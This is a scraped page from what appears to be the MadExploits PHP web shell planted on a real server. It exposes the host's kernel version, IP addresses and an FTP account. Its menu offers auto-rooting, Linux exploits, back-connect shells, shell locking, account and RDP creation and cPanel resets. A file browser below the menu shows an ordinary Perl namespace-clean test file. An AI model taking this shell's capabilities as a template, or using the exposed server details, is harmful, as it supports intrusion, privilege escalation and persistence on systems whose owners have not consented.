Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-namespace-clean /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
00-basic.t
347
B
-rw-r--r--
01-function-wipeout.t
676
B
-rw-r--r--
02-inheritance.t
737
B
-rw-r--r--
03-unimport.t
427
B
-rw-r--r--
04-except.t
756
B
-rw-r--r--
05-explicit-cleanee.t
1.6
KB
-rw-r--r--
05-syntax-error.t
178
B
-rw-r--r--
06-other-types.t
1.41
KB
-rw-r--r--
07-debugger.t
660
B
-rw-r--r--
07-pseudo-debugger.t
405
B
-rw-r--r--
08-const-sub.t
162
B
-rw-r--r--
09-fiddle-hinthash.t
860
B
-rw-r--r--
10-pure-perl.t
1.93
KB
-rw-r--r--
11-multiclean-in-scope.t
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 10-pure-perl.t
use strict; use warnings; use Test::More; BEGIN { plan skip_all => "PP tests already executed" if $ENV{NAMESPACE_CLEAN_USE_PP}; plan skip_all => "B::Hooks::EndOfScope ($INC{'B/Hooks/EndOfScope.pm'}) loaded before the test even started >.<" if $INC{'B/Hooks/EndOfScope.pm'}; plan skip_all => "Package::Stash ($INC{'Package/Stash.pm'}) loaded before the test even started >.<" if $INC{'Package/Stash.pm'}; eval { require Variable::Magic } or plan skip_all => "PP tests already executed"; $ENV{B_HOOKS_ENDOFSCOPE_IMPLEMENTATION} = 'PP'; $ENV{PACKAGE_STASH_IMPLEMENTATION} = 'PP'; plan tests => 15; } use B::Hooks::EndOfScope 0.12; use Package::Stash; ok( ($INC{'B/Hooks/EndOfScope/PP.pm'} && ! $INC{'B/Hooks/EndOfScope/XS.pm'}), 'PP BHEOS loaded properly' ) || diag join "\n", map { sprintf '%s => %s', $_, $INC{"B/Hooks/$_"} || 'undef' } qw|EndOfScope.pm EndOfScope/XS.pm EndOfScope/PP.pm| ; ok( ($INC{'Package/Stash/PP.pm'} && ! $INC{'Package/Stash/XS.pm'}), 'PP Package::Stash loaded properly' ) || diag join "\n", map { sprintf '%s => %s', $_, $INC{"Package/$_"} || 'undef' } qw|Stash.pm Stash/XS.pm Stash/PP.pm| ; use Config; use IPC::Open2 qw(open2); use File::Glob 'bsd_glob'; use Cwd 'abs_path'; # for the $^X-es $ENV{PERL5LIB} = join ($Config{path_sep}, @INC); $ENV{PATH} = ''; # rerun the tests under the assumption of pure-perl my $this_file = abs_path(__FILE__); for my $fn ( bsd_glob("t/*.t") ) { next if abs_path($fn) eq $this_file; my @cmd = map { $_ =~ /(.+)/ } ($^X, $fn); # this is cheating, and may even hang here and there (testing on windows passed fine) # if it does - will have to fix it somehow (really *REALLY* don't want to pull # in IPC::Cmd just for a fucking test) # the alternative would be to have an ENV check in each test to force a subtest open2(my $out, my $in, @cmd); while (my $ln = <$out>) { print " $ln"; } wait; ok (! $?, "Exit $? from: @cmd"); }
Close